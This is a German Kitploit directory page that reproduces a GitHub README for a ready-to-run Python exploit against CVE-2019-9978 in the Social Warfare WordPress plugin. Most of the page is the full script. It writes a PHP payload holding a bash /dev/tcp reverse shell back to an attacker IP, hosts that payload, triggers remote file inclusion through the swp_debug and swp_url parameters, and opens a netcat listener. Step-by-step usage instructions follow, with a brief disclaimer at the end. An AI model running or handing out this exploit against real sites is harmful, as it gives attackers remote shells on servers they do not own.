Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-9978-Social-Warfare-WordPress-Plugin-RCE — Der Parameter `swp_debug` in `admin-post.php` ermöglicht es entfernten Angreifern, externe Dateien einzubinden, die schädlichen PHP-Code enthalten, welcher auf dem Server ausgeführt wird. Durch die Bereitstellung einer manipulierten URL, die einen Reverse-Shell-Payload hostet, kann ein Angreifer eine Befehlsausführung erlangen. | Kitploit
Tools/GitHubGitHub/housma/cve-2019-9978-social-warfare-wordpress-plugin-rce
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed TeamingRemote-Access-Tool
GitHub
housma/cve-2019-9978-social-warfare-wordpress-plugin-rce

CVE-2019-9978-Social-Warfare-WordPress-Plugin-RCE

Repository anzeigen
2vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Der Parameter `swp_debug` in `admin-post.php` ermöglicht es entfernten Angreifern, externe Dateien einzubinden, die schädlichen PHP-Code enthalten, welcher auf dem Server ausgeführt wird. Durch die Bereitstellung einer manipulierten URL, die einen Reverse-Shell-Payload hostet, kann ein Angreifer eine Befehlsausführung erlangen.

Teilen

CVE-2019-9978 – Social Warfare WordPress Plugin RCE

Dieses Repository enthält einen funktionierenden Python-Exploit für CVE-2019-9978, eine Remote Code Execution-Schwachstelle im Social Warfare Plugin für WordPress (Version <= 3.5.2).

Beschreibung

Der Parameter swp_debug in admin-post.php erlaubt es entfernten Angreifern, externe Dateien mit schädlichem PHP-Code einzubinden, die auf dem Server ausgeführt werden. Durch die Angabe einer präparierten URL, die einen Reverse-Shell-Payload hostet, kann ein Angreifer die Befehlsausführung erlangen.

Exploit-Funktionen

  • Hostet einen PHP-Payload mit Pythons integriertem HTTP-Server.
  • Sendet einen schädlichen swp_url-Parameter, um RCE auszulösen.
  • Startet einen Netcat-Listener, um die Reverse Shell abzufangen.
  • Schreibt den Payload automatisch mit der korrekten Escapierung für eine erfolgreiche Codeausführung.

Anforderungen

  • Python 3.x
  • Netcat
  • Lokale DNS-Auflösung für die Zieldomain (z.B. example.com auf die Ziel-IP gemappt)
  • Exploit-Code

    root@kitploit:~
    #!/usr/bin/env python3
    
    import requests
    import threading
    import http.server
    import socketserver
    import os
    import subprocess
    import time
    
    # --- Config ---
    TARGET_URL = "http://example.com"
    ATTACKER_IP = "192.168.26.130"  # Change to your attack box IP
    HTTP_PORT = 8000
    LISTEN_PORT = 4447
    PAYLOAD_FILE = "payload.txt"
    
    def create_payload():
        """Write exact reverse shell payload using valid PHP syntax"""
        payload = f'<pre>system("bash -c \\"bash -i >& /dev/tcp/{ATTACKER_IP}/{LISTEN_PORT} 0>&1\\"")</pre>'
        with open(PAYLOAD_FILE, "w") as f:
            f.write(payload)
        print(f"[+] Payload written to {PAYLOAD_FILE}")
    
    def start_http_server():
        """Serve payload over HTTP"""
        handler = http.server.SimpleHTTPRequestHandler
        with socketserver.TCPServer(("", HTTP_PORT), handler) as httpd:
            print(f"[+] HTTP server running at port {HTTP_PORT}")
            httpd.serve_forever()
    
    def start_listener():
        """Start Netcat listener"""
        print(f"[+] Listening on port {LISTEN_PORT} for reverse shell...")
        subprocess.call(["nc", "-lvnp", str(LISTEN_PORT)])
    
    def send_exploit():
        """Trigger the exploit with vulnerable parameter"""
        payload_url = f"http://{ATTACKER_IP}:{HTTP_PORT}/{PAYLOAD_FILE}"
        exploit = f"{TARGET_URL}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={payload_url}"
        print(f"[+] Sending exploit: {exploit}")
        try:
            requests.get(exploit, timeout=5)
        except requests.exceptions.RequestException:
            pass
    
    def main():
        create_payload()
    
        # Start web server in background
        http_thread = threading.Thread(target=start_http_server, daemon=True)
        http_thread.start()
        time.sleep(2)  # Give server time to start
    
        # Start listener in background
        listener_thread = threading.Thread(target=start_listener)
        listener_thread.start()
        time.sleep(1)
    
        # Send the malicious request
        send_exploit()
    
    if __name__ == "__main__":
        try:
            main()
        except KeyboardInterrupt:
            print("[-] Interrupted by user.")
    

    Verwendung

    1. Aktualisieren Sie ATTACKER_IP und LISTEN_PORT auf die IP Ihres Rechners und den gewünschten Port.
    2. Stellen Sie sicher, dass die Zieladresse example.com zur korrekten IP aufgelöst wird.
    3. Führen Sie das Skript aus:
    root@kitploit:~
    python3 exploit.py
    
    1. Fangen Sie die Reverse Shell in Ihrem Listener.

    Referenzen

    • https://nvd.nist.gov/vuln/detail/CVE-2019-9978
    • https://github.com/hash3liZer/CVE-2019-9978

    Haftungsausschluss

    Dieser Exploit wird nur zu Bildungszwecken bereitgestellt. Verwenden Sie ihn nicht ohne ausdrückliche Erlaubnis auf einem System, das Ihnen nicht gehört.

    Tool herunterladen